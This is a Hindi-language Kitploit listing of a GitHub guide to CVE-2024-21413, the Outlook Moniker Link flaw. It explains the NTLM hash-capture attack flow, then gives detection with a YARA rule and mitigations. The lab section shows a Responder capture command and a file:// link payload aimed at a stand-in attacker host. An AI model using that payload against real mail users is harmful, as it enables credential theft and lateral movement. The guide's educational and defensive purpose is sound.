Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Moniker-Link--CVE-2024-21413- — CVE-2024-21413, Outlook ज़ीरो-क्लिक Moniker Link कमजोरी, पर शैक्षिक मार्गदर्शिका, जिसमें हमले का प्रवाह, NTLM क्रेडेंशियल कैप्चर, YARA के साथ पहचान, और शमन रणनीतियाँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
पासवर्ड क्रैकिंगफ़िशिंग उपकरणभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनापार्श्व आंदोलनपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
ईमेल सुरक्षा
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

CVE-2024-21413, Outlook ज़ीरो-क्लिक Moniker Link कमजोरी, पर शैक्षिक मार्गदर्शिका, जिसमें हमले का प्रवाह, NTLM क्रेडेंशियल कैप्चर, YARA के साथ पहचान, और शमन रणनीतियाँ शामिल हैं।

रिपॉजिटरी देखें
64 महीने पहलेअभी तक समीक्षित नहीं

🔗 मोनिकर लिंक (CVE-2024-21413) — आउटलुक जीरो-क्लिक भेद्यता के लिए एक व्यावहारिक मार्गदर्शिका


📌 1. परिचय

CVE-2024-21413, जिसे सामान्यतः मोनिकर लिंक भेद्यता कहा जाता है, Microsoft Outlook में एक गंभीर सुरक्षा दोष है जो हमलावरों को बिना किसी इंटरैक्शन के उपयोगकर्ता क्रेडेंशियल्स लीक करने में सक्षम बनाता है।

पारंपरिक फ़िशिंग हमलों के विपरीत, इस भेद्यता को केवल एक ईमेल का पूर्वावलोकन करके ट्रिगर किया जा सकता है, जो इसे उद्यम वातावरण में विशेष रूप से खतरनाक बनाता है।

समस्या इस बात से उत्पन्न होती है कि आउटलुक मोनिकर लिंक को कैसे प्रोसेस करता है, जिससे हमलावर-नियंत्रित सिस्टम पर अनजाने में प्रमाणीकरण प्रयास होते हैं।


🧠 2. मुख्य अवधारणाएँ

निम्नलिखित अवधारणाओं को समझना आवश्यक है:

🔹 मोनिकर लिंक

एक विंडोज़-विशिष्ट तंत्र जो एप्लिकेशन को निम्नलिखित प्रोटोकॉल का उपयोग करके बाहरी संसाधनों को संदर्भित करने की अनुमति देता है:

  • file://
  • unc://

🔹 NTLM प्रमाणीकरण

  • एक विरासत विंडोज़ प्रमाणीकरण प्रोटोकॉल
  • दूरस्थ संसाधनों तक पहुँचने पर स्वचालित रूप से हैश किए गए क्रेडेंशियल भेजता है
  • क्रेडेंशियल कैप्चर और रिले हमलों के लिए संवेदनशील

🔹 UNC पथ (यूनिवर्सल नेमिंग कन्वेंशन)

root@kitploit:~
\\attacker-server\share

नेटवर्क पर साझा संसाधनों तक पहुँचने के लिए उपयोग किया जाता है। इस भेद्यता में, इसका दुरुपयोग प्रमाणीकरण अनुरोधों को बलपूर्वक करने के लिए किया जाता है।

🔹 संरक्षित दृश्य बाईपास

आउटलुक का संरक्षित दृश्य संभावित असुरक्षित सामग्री को अलग करने के लिए डिज़ाइन किया गया है। यह भेद्यता उस सुरक्षा को बायपास करती है, जिससे बाहरी संसाधनों तक पहुँच संभव होती है।


⚙️ 3. यह कैसे काम करता है

हमला प्रवाह (चरण-दर-चरण)

  1. पेलोड तैयार करना

    • हमलावर एक ईमेल के अंदर एक दुर्भावनापूर्ण मोनिकर लिंक (जैसे, file://attacker-server/share) एम्बेड करता है।
  2. वितरण

    • ईमेल पीड़ित को भेजा जाता है।
  3. ट्रिगर

    • पीड़ित आउटलुक में ईमेल का पूर्वावलोकन करता है या खोलता है।
  4. स्वचालित प्रसंस्करण

    • आउटलुक बिना उपयोगकर्ता इंटरैक्शन के लिंक को प्रोसेस करता है।
  5. प्रमाणीकरण अनुरोध

    • विंडोज़ हमलावर के सर्वर पर NTLM प्रमाणीकरण का प्रयास करता है।
  6. क्रेडेंशियल एक्सपोज़र

    • हमलावर NTLM हैश को कैप्चर करता है।

हमला प्रवाह आरेख

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. वास्तविक दुनिया का प्रभाव

सामान्य हमला परिदृश्य

  • संगठनों के विरुद्ध लक्षित फ़िशिंग अभियान
  • कॉर्पोरेट नेटवर्क में क्रेडेंशियल हार्वेस्टिंग
  • पार्श्व संचलन के लिए प्रारंभिक पहुँच

हमलावर के उद्देश्य

  • NTLM हैश कैप्चर करना
  • आंतरिक सेवाओं में प्रमाणीकरण रिले करना
  • नेटवर्क के भीतर विशेषाधिकार बढ़ाना

🛠️ 5. उपकरण और प्रौद्योगिकियाँ

आक्रामक / अनुसंधान उपकरण

  • Responder — NTLM प्रमाणीकरण हैश कैप्चर करता है
  • Impacket — नेटवर्क शोषण टूलकिट
  • ntlmrelayx.py — NTLM रिले हमले करता है

रक्षात्मक उपकरण

  • Microsoft Defender — एंडपॉइंट डिटेक्शन और रिस्पॉन्स
  • Wireshark — नेटवर्क ट्रैफ़िक निरीक्षण
  • Sysmon — उन्नत सिस्टम इवेंट लॉगिंग

💻 6. व्यावहारिक उदाहरण (केवल प्रयोगशाला वातावरण)

⚠️ केवल नियंत्रित प्रयोगशाला वातावरण में ही प्रदर्शन करें

NTLM कैप्चर सेवा प्रारंभ करें

root@kitploit:~
sudo responder -I eth0

दुर्भावनापूर्ण लिंक का उदाहरण

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

अपेक्षित आउटपुट

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. पहचान (YARA नियम)

फ्लोरियन रोथ द्वारा मोनिकर लिंक से जुड़े शोषण प्रयासों की पहचान करने के लिए एक पहचान नियम विकसित किया गया था।

YARA नियम उदाहरण

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

पहचान उपयोग के मामले

  • ईमेल गेटवे स्कैनिंग
  • SIEM अलर्ट जनरेशन
  • संदिग्ध लिंक के लिए खतरे की खोज

🛡️ 8. शमन और सर्वोत्तम अभ्यास

पैच प्रबंधन

  • Microsoft द्वारा प्रदान किए गए सुरक्षा अपडेट तुरंत लागू करें

प्रमाणीकरण सख्तीकरण

  • जहाँ संभव हो NTLM अक्षम करें
  • केरबेरोस प्रमाणीकरण लागू करें

नेटवर्क नियंत्रण

  • बाहरी नेटवर्कों के लिए आउटबाउंड SMB (TCP 445) अवरुद्ध करें
  • अनावश्यक आउटबाउंड कनेक्शन प्रतिबंधित करें

ईमेल सुरक्षा

  • file:// और UNC-आधारित लिंक को फ़िल्टर या स्वच्छ करें
  • उन्नत ईमेल खतरा सुरक्षा समाधान का उपयोग करें

निगरानी और पहचान

  • आउटबाउंड प्रमाणीकरण प्रयासों की निगरानी करें
  • असामान्य SMB ट्रैफ़िक को लॉग और अलर्ट करें

⚠️ 9. सामान्य गलतियाँ

  • यह मान लेना कि उपयोगकर्ता इंटरैक्शन आवश्यक है
  • आधुनिक वातावरण में NTLM-संबंधित जोखिमों को नज़रअंदाज़ करना
  • नेटवर्क नियंत्रणों के बिना पूरी तरह से एंटीवायरस पर निर्भर रहना
  • पैच तैनाती में देरी करना

🧾 10. निष्कर्ष

CVE-2024-21413 यह प्रदर्शित करता है कि गहराई से एकीकृत सिस्टम व्यवहार (जैसे स्वचालित प्रमाणीकरण) का शोषण ईमेल लिंक जैसे प्रतीत होने वाले हानिरहित इनपुट के माध्यम से कैसे किया जा सकता है।

मुख्य निष्कर्ष

  • जीरो-क्लिक भेद्यता — कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं
  • आउटलुक के मोनिकर लिंक हैंडलिंग का शोषण करता है
  • NTLM क्रेडेंशियल लीकेज में परिणाम
  • YARA और नेटवर्क निगरानी का उपयोग करके पता लगाने योग्य
  • पैचिंग और उचित कॉन्फ़िगरेशन के माध्यम से रोकने योग्य

📚 11. आगे पढ़ें

  • Microsoft सुरक्षा सलाहकार — CVE-2024-21413
  • Impacket दस्तावेज़ीकरण (NTLM रिले हमले)
  • YARA दस्तावेज़ीकरण
  • OWASP प्रमाणीकरण चीट शीट

💡 अनुशंसा: हमला श्रृंखला और रक्षात्मक रणनीतियों को पूरी तरह से समझने के लिए इस भेद्यता को एक वर्चुअल लैब (उदाहरण के लिए, Windows VM + हमलावर VM) में पुन: उत्पन्न करें।

टूल डाउनलोड करें